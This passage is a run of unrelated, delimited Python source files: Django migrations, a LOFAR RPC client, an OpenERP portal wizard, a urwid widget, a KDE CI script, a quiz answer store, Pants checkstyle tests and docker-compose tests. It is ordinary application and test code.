('product_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='b5.Buyers', to_field='product_class')),
],
),
migrations.CreateModel(
name='RegularWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='ReplacedImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('old_filename', models.CharField(blank=True, max_length=50, null=True)),
('new_filename', models.CharField(blank=True, max_length=50, null=True)),
('change_date', models.DateField(blank=True, default=datetime.date.today, null=True)),
],
),
migrations.CreateModel(
name='RumbaProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('size', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='ThumbWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fullname', models.CharField(max_length=64)),
('position', models.CharField(blank=True, max_length=64, null=True)),
('phone', models.CharField(blank=True, max_length=15, null=True)),
('extension', models.CharField(blank=True, max_length=15, null=True)),
('mobile', models.CharField(blank=True, max_length=15, null=True)),
('fax', models.CharField(blank=True, max_length=15, null=True)),
('notes', models.TextField(blank=True, max_length=2000, null=True)),
('email', models.EmailField(max_length=254)),
('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['user__last_name'],
},
),
migrations.CreateModel(
name='WatchedItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=210, null=True)),
('comments', models.TextField(blank=True, max_length=2000, null=True)),
('confirmed_placed', models.CharField(blank=True, default=None, max_length=200, null=True)),
('watched_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='b5.UserProfile')),
],
),
migrations.AddField(
model_name='replacedimage',
name='processor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='b5.UserProfile'),
),
migrations.AddField(
model_name='oneimagefiles',
name='filenames',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='b5.PrintFile'),
),
migrations.AlterUniqueTogether(
name='inventoryproduct',
unique_together=set([('sku', 'source')]),
),
migrations.AddField(
model_name='department',
name='member',
field=models.ManyToManyField(to='b5.UserProfile'),
),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-06-26 17:55
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contentcuration', '0085_user_policies'),
]
operations = [
migrations.AlterField(
model_name='channel',
name='content_defaults',
field=django.contrib.postgres.fields.jsonb.JSONField(default={b'author': None, b'auto_derive_audio_thumbnail': True, b'auto_derive_document_thumbnail': True, b'auto_derive_exercise_thumbnail': True, b'auto_derive_html5_thumbnail': True,
b'auto_derive_video_thumbnail': True, b'auto_randomize_questions': True, b'copyright_holder': None, b'language': None, b'license': None, b'license_description': None, b'm_value': 5, b'mastery_model': b'num_correct_in_a_row_5', b'n_value': 5}),
),
migrations.AlterField(
model_name='user',
name='content_defaults',
field=django.contrib.postgres.fields.jsonb.JSONField(default={b'author': None, b'auto_derive_audio_thumbnail': True, b'auto_derive_document_thumbnail': True, b'auto_derive_exercise_thumbnail': True, b'auto_derive_html5_thumbnail': True,
b'auto_derive_video_thumbnail': True, b'auto_randomize_questions': True, b'copyright_holder': None, b'language': None, b'license': None, b'license_description': None, b'm_value': 5, b'mastery_model': b'num_correct_in_a_row_5', b'n_value': 5}),
),
migrations.AlterField(
model_name='user',
name='information',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
migrations.AlterField(
model_name='user',
name='policies',
field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
),
]
|
#!/usr/bin/python
import sys
import logging
from optparse import OptionParser
from lofar.messaging.RPC import RPC, RPCException, RPCWrapper
from lofar.mom.momqueryservice.config import DEFAULT_MOMQUERY_BUSNAME, DEFAULT_MOMQUERY_SERVICENAME
''' Simple RPC client for Service momqueryservice
'''
logger = logging.getLogger(__file__)
class MoMQueryRPC(RPCWrapper):
def getProjectDetails(self, ids):
'''get the project details for one or more mom ids
:param ids single or list of mom ids
:rtype dict with project details'''
if isinstance(ids, int) or isinstance(ids, str):
ids = [ids]
ids = [str(x) for x in ids]
ids_string = ', '.join(ids)
logger.info("Requesting details for mom objects: %s" % (str(ids_string)))
result = self.rpc('GetProjectDetails', mom_ids=ids_string)
logger.info("Received details for %s mom objects" % (len(result)))
return result
def getProjects(self):
'''get all projects
:rtype dict with all projects'''
logger.info("Requesting all projects")
projects = self.rpc('GetProjects')
for project in projects:
project['statustime'] = project['statustime'].datetime()
logger.info("Received %s projects" % (len(projects)))
return projects
def main():
# Check the invocation arguments
parser = OptionParser('%prog [options]',
description='do requests to the momqueryservice from the commandline')
parser.add_option('-q', '--broker', dest='broker', type='string', default=None, help='Address of the qpid broker, default: localhost')
parser.add_option('-b', '--busname', dest='busname', type='string', default=DEFAULT_MOMQUERY_BUSNAME, help='Name of the bus exchange on the qpid broker, default: [%default]')
parser.add_option('-s', '--servicename', dest='servicename', type='string', default=DEFAULT_MOMQUERY_SERVICENAME, help='Name for this service, default: [%default]')
parser.add_option('-V', '--verbose', dest='verbose', action='store_true', help='verbose logging')
parser.add_option('-P', '--projects', dest='projects', action='store_true', help='get list of all projects')
parser.add_option('-p', '--project_details', dest='project_details', type='int', help='get project details for mom object with given id')
(options, args) = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO if options.verbose else logging.WARN)
with MoMQueryRPC(busname=options.busname, servicename=options.servicename, broker=options.broker) as rpc:
if options.projects:
projects = rpc.getProjects()
for project in projects:
print project
if options.project_details:
projects_details = rpc.getProjectDetails(options.project_details)
if projects_details:
for k, v in projects_details.items():
print ' %s: %s' % (k, v)
else:
print 'No results'
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2011 OpenERP S.A (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import random
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import email_split
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
# welcome email sent to portal users
# (note that calling '_' has no effect except exporting those strings for translation)
WELCOME_EMAIL_SUBJECT = _("Your OpenERP account at %(company)s")
WELCOME_EMAIL_BODY = _("""Dear %(name)s,
You have been given access to %(portal)s.
Your login account data is:
Database: %(db)s
Username: %(login)s
In order to complete the signin process, click on the following url:
%(url)s
%(welcome_message)s
--
OpenERP - Open Source Business Applications
http://www.openerp.com
""")
def extract_email(email):
""" extract the email address from a user-friendly email address """
addresses = email_split(email)
return addresses[0] if addresses else ''
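# Illustrative example only, assuming the usual behaviour of
# openerp.tools.email_split on "Name <address>" strings:
#   extract_email('John Doe <[email protected]>')  ->  '[email protected]'
#   extract_email('not an email')                    ->  ''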
class wizard(osv.osv_memory):
"""
A wizard to manage the creation/removal of portal users.
"""
_name = 'portal.wizard'
_description = 'Portal Access Management'
_columns = {
'portal_id': fields.many2one('res.groups', domain=[('is_portal', '=', True)], required=True,
string='Portal', help="The portal that users can be added in or removed from."),
'user_ids': fields.one2many('portal.wizard.user', 'wizard_id', string='Users'),
'welcome_message': fields.text(string='Invitation Message',
help="This text is included in the email sent to new users of the portal."),
}
def _default_portal(self, cr, uid, context):
portal_ids = self.pool.get('res.groups').search(cr, uid, [('is_portal', '=', True)])
return portal_ids and portal_ids[0] or False
_defaults = {
'portal_id': _default_portal,
}
def onchange_portal_id(self, cr, uid, ids, portal_id, context=None):
# for each partner, determine corresponding portal.wizard.user records
res_partner = self.pool.get('res.partner')
partner_ids = context and context.get('active_ids') or []
contact_ids = set()
user_changes = []
for partner in res_partner.browse(cr, SUPERUSER_ID, partner_ids, context):
for contact in (partner.child_ids or [partner]):
# make sure that each contact appears at most once in the list
if contact.id not in contact_ids:
contact_ids.add(contact.id)
in_portal = False
if contact.user_ids:
in_portal = portal_id in [g.id for g in contact.user_ids[0].groups_id]
user_changes.append((0, 0, {
'partner_id': contact.id,
'email': contact.email,
'in_portal': in_portal,
}))
return {'value': {'user_ids': user_changes}}
def action_apply(self, cr, uid, ids, context=None):
wizard = self.browse(cr, uid, ids[0], context)
portal_user_ids = [user.id for user in wizard.user_ids]
self.pool.get('portal.wizard.user').action_apply(cr, uid, portal_user_ids, context)
return {'type': 'ir.actions.act_window_close'}
class wizard_user(osv.osv_memory):
"""
A model to configure users in the portal wizard.
"""
_name = 'portal.wizard.user'
_description = 'Portal User Config'
_columns = {
'wizard_id': fields.many2one('portal.wizard', string='Wizard', required=True, ondelete="cascade"),
'partner_id': fields.many2one('res.partner', string='Contact', required=True, readonly=True),
'email': fields.char(size=240, string='Email'),
'in_portal': fields.boolean('In Portal'),
}
def create(self, cr, uid, values, context=None):
""" overridden to update the partner's email (if necessary) """
id = super(wizard_user, self).create(cr, uid, values, context)
wuser = self.browse(cr, uid, id, context)
if wuser.partner_id.email != wuser.email:
wuser.partner_id.write({'email': wuser.email})
return id
def action_apply(self, cr, uid, ids, context=None):
self.pool['res.partner'].check_access_rights(cr, uid, 'write')
for wizard_user in self.browse(cr, SUPERUSER_ID, ids, context):
portal = wizard_user.wizard_id.portal_id
if not portal.is_portal:
raise osv.except_osv("Error", "Not a portal: " + portal.name)
user = self._retrieve_user(cr, SUPERUSER_ID, wizard_user, context)
if wizard_user.in_portal:
# create a user if necessary, and make sure it is in the portal group
if not user:
user = self._create_user(cr, SUPERUSER_ID, wizard_user, context)
if (not user.active) or (portal not in user.groups_id):
user.write({'active': True, 'groups_id': [(4, portal.id)]})
# prepare for the signup process
user.partner_id.signup_prepare()
wizard_user = self.browse(cr, SUPERUSER_ID, wizard_user.id, context)
self._send_email(cr, uid, wizard_user, context)
else:
# remove the user (if it exists) from the portal group
if user and (portal in user.groups_id):
# if user belongs to portal only, deactivate it
if len(user.groups_id) <= 1:
user.write({'groups_id': [(3, portal.id)], 'active': False})
else:
user.write({'groups_id': [(3, portal.id)]})
def _retrieve_user(self, cr, uid, wizard_user, context=None):
""" retrieve the (possibly inactive) user corresponding to wizard_user.partner_id
@param wizard_user: browse record of model portal.wizard.user
@return: browse record of model res.users
"""
if wizard_user.partner_id.user_ids:
return wizard_user.partner_id.user_ids[0]
# the user may be inactive, search for it
res_users = self.pool.get('res.users')
domain = [('partner_id', '=', wizard_user.partner_id.id), ('active', '=', False)]
user_ids = res_users.search(cr, uid, domain)
return user_ids and res_users.browse(cr, uid, user_ids[0], context) or False
def _create_user(self, cr, uid, wizard_user, context=None):
""" create a new user for wizard_user.partner_id
@param wizard_user: browse record of model portal.wizard.user
@return: browse record of model res.users
"""
res_users = self.pool.get('res.users')
create_context = dict(context or {}, noshortcut=True) # to prevent shortcut creation
values = {
'login': extract_email(wizard_user.email),
'partner_id': wizard_user.partner_id.id,
'groups_id': [(6, 0, [])],
'share': True,
}
user_id = res_users.create(cr, uid, values, context=create_context)
return res_users.browse(cr, uid, user_id, context)
def _send_email(self, cr, uid, wizard_user, context=None):
""" send notification email to a new portal user
@param wizard_user: browse record of model portal.wizard.user
@return: the id of the created mail.mail record
"""
this_context = context
this_user = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context)
if not this_user.email:
raise osv.except_osv(_('Email Required'),
_('You must have an email address in your User Preferences to send emails.'))
# determine subject and body in the portal user's language
user = self._retrieve_user(cr, SUPERUSER_ID, wizard_user, context)
context = dict(this_context or {}, lang=user.lang)
data = {
'company': this_user.company_id.name,
'portal': wizard_user.wizard_id.portal_id.name,
'welcome_message': wizard_user.wizard_id.welcome_message or "",
'db': cr.dbname,
'name': user.name,
'login': user.login,
'url': user.signup_url,
}
mail_mail = self.pool.get('mail.mail')
mail_values = {
'email_from': this_user.email,
'email_to': user.email,
'subject': _(WELCOME_EMAIL_SUBJECT) % data,
'body_html': '<pre>%s</pre>' % (_(WELCOME_EMAIL_BODY) % data),
'state': 'outgoing',
'type': 'email',
}
mail_id = mail_mail.create(cr, uid, mail_values, context=this_context)
return mail_mail.send(cr, uid, [mail_id], context=this_context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# -*- coding: utf-8 -*-
import urwid
__author__ = 'Sumin Byeon'
__version__ = '0.1.3'
__all__ = ['StackedWidget']
class StackedWidget(urwid.Widget):
"""A widget container that presents one child widget at a time."""
#: A list containing all widgets
widgets = []
#: An index of the current widget
current = 0
def __init__(self):
self.widgets = []
self.current = 0
def push_widget(self, widget):
"""Appends a widget at the end of the list."""
self.widgets.append(widget)
def insert_widget(self, index, widget):
"""Inserts a widget at a given index."""
self.widgets.insert(index, widget)
def pop_widget(self):
"""Retrieves and removes the last widget (with the maximum index)."""
n = len(self.widgets)
assert n > 0
widget = self.widgets.pop()
if self.current == n - 1:
self.current -= 1
self._invalidate()
return widget
def show_widget(self, index):
assert 0 <= index < len(self.widgets)
self.current = index
self._invalidate()
def show_next_widget(self):
n = self.widget_count
self.show_widget((self.current + 1) % n)
def show_previous_widget(self):
n = self.widget_count
self.show_widget((self.current - 1 + n) % n)
@property
def widget_count(self):
"""The function name is pretty much self-explanatory."""
return len(self.widgets)
@property
def current_widget(self):
"""Returns a widget that is currently being rendered. If the widget
list is empty, it returns None."""
if self.widget_count > 0:
return self.widgets[self.current]
else:
return None
def selectable(self):
"""It appears ``selectable()`` must return ``True`` in order to get any
key input."""
return True
def render(self, size, focus=False):
assert self.current_widget is not None
return self.current_widget.render(size, focus)
def keypress(self, size, key):
"""Passes key inputs to the current widget. If the current widget is
``None`` then it returns the given key input so that
``unhandled_input`` function can handle it."""
if self.current_widget is not None:
return self.current_widget.keypress(size, key)
else:
return key
def mouse_event(self, size, event, button, col, row, focus):
if self.current_widget is not None:
return self.current_widget.mouse_event(
size, event, button, col, row, focus)
else:
return False
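# Illustrative sketch only (not shipped with this module): one hypothetical way
# to drive a StackedWidget from urwid's MainLoop. Text/Filler widgets are not
# selectable, so key presses fall through to ``unhandled_input``, which is used
# here to flip between the stacked pages.
def _demo():
    stack = StackedWidget()
    stack.push_widget(urwid.Filler(urwid.Text('Page 1 -- TAB switches, Q quits')))
    stack.push_widget(urwid.Filler(urwid.Text('Page 2 -- TAB switches, Q quits')))

    def unhandled_input(key):
        if key == 'tab':
            stack.show_next_widget()
        elif key in ('q', 'Q'):
            raise urwid.ExitMainLoop()

    urwid.MainLoop(stack, unhandled_input=unhandled_input).run()

if __name__ == '__main__':
    _demo()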
|
#!/usr/bin/python
import sys
import time
import argparse
from kdecilib import *
# Load our command line arguments
parser = argparse.ArgumentParser(description='Utility to initialize a git repository before handover to the build executor.')
parser.add_argument('--project', type=str)
parser.add_argument('--branchGroup', type=str, default='latest-qt4')
parser.add_argument('--sources', type=str)
parser.add_argument('--delay', type=int, default=10)
parser.add_argument('--platform', type=str, choices=['linux64-g++', 'darwin-mavericks', 'windows64-vs2013'], default='linux64-g++')
parser.add_argument('--compiler', type=str, choices=['gcc', 'clang', 'mingw', 'vs2013'], default='gcc')
# Parse the arguments
environmentArgs = check_jenkins_environment()
arguments = parser.parse_args( namespace=environmentArgs )
# Load the various configuration files, and the projects
config = load_project_configuration( arguments.project, arguments.branchGroup, arguments.platform, arguments.compiler )
if not load_projects( 'kde_projects.xml', 'http://projects.kde.org/kde_projects.xml', 'config/projects', 'dependencies/logical-module-structure' ):
sys.exit("Failure to load projects - unable to continue")
# Load the requested project
project = ProjectManager.lookup( arguments.project )
if project is None:
sys.exit("Requested project %s was not found." % arguments.project)
# First we must wait for the anongit mirrors to settle
time.sleep( arguments.delay )
# Prepare the sources and handover to Jenkins
manager = BuildManager(project, arguments.branchGroup, arguments.sources, config, arguments.platform)
print "\nPreparing to perform KDE Continuous Integration build"
print "== Setting Up Sources\n"
manager.checkout_sources()
print "\n== Cleaning Source Tree\n"
manager.cleanup_sources()
|
# Copyright (C) 2013 W. Trevor King <[email protected]>
#
# This file is part of quizzer.
#
# quizzer is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# quizzer is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# quizzer. If not, see <http://www.gnu.org/licenses/>.
import codecs as _codecs
import datetime as _datetime
import json as _json
from . import __version__
class AnswerDatabase (dict):
def __init__(self, path=None, encoding=None):
super(AnswerDatabase, self).__init__()
self.path = path
self.encoding = encoding
def _open(self, mode='r', path=None, encoding=None):
if path:
self.path = path
if encoding:
self.encoding = encoding
return _codecs.open(self.path, mode, self.encoding)
def load(self, **kwargs):
with self._open(mode='r', **kwargs) as f:
data = _json.load(f)
version = data.get('version', None)
if version != __version__:
try:
upgrader = getattr(
self, '_upgrade_from_{}'.format(version.replace('.', '_')))
except AttributeError as e:
raise NotImplementedError('upgrade from {} to {}'.format(
version, __version__)) from e
data = upgrader(data)
self.update(data['answers'])
if '' in self:
self[None] = self.pop('')
def save(self, **kwargs):
answers = dict(self)
if None in answers:
answers[''] = answers.pop(None)
data = {
'version': __version__,
'answers': answers,
}
with self._open(mode='w', **kwargs) as f:
_json.dump(
data, f, indent=2, separators=(',', ': '), sort_keys=True)
f.write('\n')
def add(self, question, answer, correct, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
if user not in self:
self[user] = {}
if question.id not in self[user]:
self[user][question.id] = []
timezone = _datetime.timezone.utc
timestamp = _datetime.datetime.now(tz=timezone).isoformat()
self[user][question.id].append({
'answer': answer,
'correct': correct,
'timestamp': timestamp,
})
def get_answers(self, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
return self.get(user, {})
def _get_questions(self, check, questions, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
answers = self.get_answers(user=user)
return [q for q in questions if check(question=q, answers=answers)]
def get_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers: question.id in answers,
**kwargs)
def get_unanswered(self, **kwargs):
return self._get_questions(
check=lambda question, answers: question.id not in answers,
**kwargs)
def get_correctly_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers:
True in [a['correct'] for a in answers.get(question.id, [])],
**kwargs)
def get_never_correctly_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers:
True not in [a['correct']
for a in answers.get(question.id, [])],
**kwargs)
def _upgrade_from_0_1(self, data):
data['version'] = __version__
data['answers'] = {'': data['answers']} # add user-id key
return data
_upgrade_from_0_2 = _upgrade_from_0_1
_upgrade_from_0_3 = _upgrade_from_0_1
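# Illustrative sketch only (not part of quizzer): a hypothetical round-trip
# through the database. The namedtuple below is a stand-in for any question
# object that exposes an ``id`` attribute; the path is an arbitrary example.
def _example_round_trip(path='answers.json'):
    import collections
    Question = collections.namedtuple('Question', ['id'])
    question = Question(id='q1')
    db = AnswerDatabase(path=path, encoding='utf-8')
    db.add(question=question, answer='42', correct=True, user='alice')
    db.save()
    reloaded = AnswerDatabase(path=path, encoding='utf-8')
    reloaded.load()
    # 'q1' was answered correctly at least once by 'alice'
    assert reloaded.get_correctly_answered(
        questions=[question], user='alice') == [question]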
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import os
import shutil
from builtins import open
from contextlib import contextmanager
from textwrap import dedent
from pants.base.build_environment import get_buildroot
from pants.util.contextutil import temporary_dir
from pants_test.pants_run_integration_test import PantsRunIntegrationTest, ensure_cached
class CheckstyleIntegrationTest(PantsRunIntegrationTest):
def _create_config_file(self, filepath, rules_xml=''):
with open(filepath, 'w') as f:
f.write(dedent(
"""<?xml version="1.0"?>
<!DOCTYPE module PUBLIC
"-//Puppy Crawl//DTD Check Configuration 1.3//EN"
"http://www.puppycrawl.com/dtds/configuration_1_3.dtd">
<module name="Checker">
{rules_xml}
</module>""".format(rules_xml=rules_xml)))
@ensure_cached(expected_num_artifacts=2)
def test_config_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
configs = [
dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>"""),
dedent("""
<module name="TreeWalker">
<module name="LineLength">
<property name="max" value="100"/>
</module>
</module>""")
]
for config in configs:
# Ensure that even though the config files have the same name, their
# contents will invalidate the targets.
config_file = os.path.join(tmp, 'config.xml')
self._create_config_file(config_file, config)
args = [
'clean-all',
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file)
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_config_name_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
config_names = ['one.xml', 'two.xml']
config = dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>""")
for config_name in config_names:
# Ensure that even though the config files have the same contents, their
# differing names will invalidate the targets.
config_file = os.path.join(tmp, config_name)
self._create_config_file(config_file, config)
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file)
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@contextmanager
def _temporary_buildroot(self, files_to_copy, current_root=None):
if current_root is None:
current_root = get_buildroot()
files_to_copy = set(files_to_copy)
files_to_copy.update(f for f in os.listdir(current_root)
if f.endswith('.ini') or f.startswith('BUILD'))
files_to_copy.update((
'pants',
'3rdparty',
'build-support',
'contrib',
'pants-plugins',
'src',
))
with temporary_dir() as temp_root:
temp_root = os.path.normpath(temp_root)
for path in files_to_copy:
src = os.path.join(current_root, path)
dst = os.path.join(temp_root, path)
if os.path.isdir(path):
shutil.copytree(src, dst)
else:
shutil.copyfile(src, dst)
current = os.getcwd()
try:
os.chdir(temp_root)
temp_root = os.getcwd()
yield temp_root
finally:
os.chdir(current)
def _temporary_buildroots(self, files_to_copy=None, current_root=None, iterations=2):
while iterations:
with self._temporary_buildroot(files_to_copy, current_root) as root:
yield root
iterations -= 1
@ensure_cached(expected_num_artifacts=1)
def test_config_buildroot_does_not_invalidate_targets(self, cache_args):
previous_names = set()
for buildroot in self._temporary_buildroots(['examples']):
with self.temporary_workdir() as workdir:
tmp = os.path.join(buildroot, 'tmp')
os.mkdir(tmp)
config = dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>""")
# The config file has the same name and contents in every buildroot, so a
# change of buildroot alone should not invalidate the targets.
config_file = os.path.join(tmp, 'one.xml')
self.assertNotIn(config_file, previous_names)
previous_names.add(config_file)
self._create_config_file(config_file, config)
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=1)
def test_properties_file_names_do_not_invalidate_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
suppression_names = ['one-supress.xml', 'two-supress.xml']
suppression_data = dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip()
for suppression_name in suppression_names:
suppression_file = os.path.join(tmp, suppression_name)
self._create_config_file(suppression_file, suppression_data)
properties = {
'checkstyle.suppression.files': suppression_file,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_properties_file_contents_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
suppression_files = [
dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip(),
dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
<suppress files=".*/really-bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip(),
]
for suppressions in suppression_files:
suppression_file = os.path.join(tmp, 'suppressions.xml')
self._create_config_file(suppression_file, suppressions)
properties = {
'checkstyle.suppression.files': suppression_file,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_properties_nonfile_values_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()):
values = ['this-is-not-a-file', '37']
for value in values:
properties = {
'my.value': value,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_jvm_tool_changes_invalidate_targets(self, cache_args):
with self.temporary_workdir() as workdir:
# Only the second (final) use of the default checkstyle should hit the cache and avoid invalidating anything.
for checkstyle_jar in (None, 'testprojects/3rdparty/checkstyle', None):
args = [
'lint.checkstyle',
cache_args,
'--checkstyle={}'.format(checkstyle_jar) if checkstyle_jar else '',
'examples/src/java/org/pantsbuild/example/hello/simple'
]
pants_run = self.run_pants_with_workdir(args, workdir)
print(pants_run.stdout_data)
self.assert_success(pants_run)
|
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import docker
from .. import mock
from .. import unittest
from compose.config.config import Config
from compose.config.types import VolumeFromSpec
from compose.const import LABEL_SERVICE
from compose.container import Container
from compose.project import Project
from compose.service import ContainerNet
from compose.service import Net
from compose.service import Service
class ProjectTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.Client)
def test_from_dict(self):
project = Project.from_config('composetest', Config(None, [
{
'name': 'web',
'image': 'busybox:latest'
},
{
'name': 'db',
'image': 'busybox:latest'
},
], None), None)
self.assertEqual(len(project.services), 2)
self.assertEqual(project.get_service('web').name, 'web')
self.assertEqual(project.get_service('web').options['image'], 'busybox:latest')
self.assertEqual(project.get_service('db').name, 'db')
self.assertEqual(project.get_service('db').options['image'], 'busybox:latest')
def test_from_config(self):
dicts = Config(None, [
{
'name': 'web',
'image': 'busybox:latest',
},
{
'name': 'db',
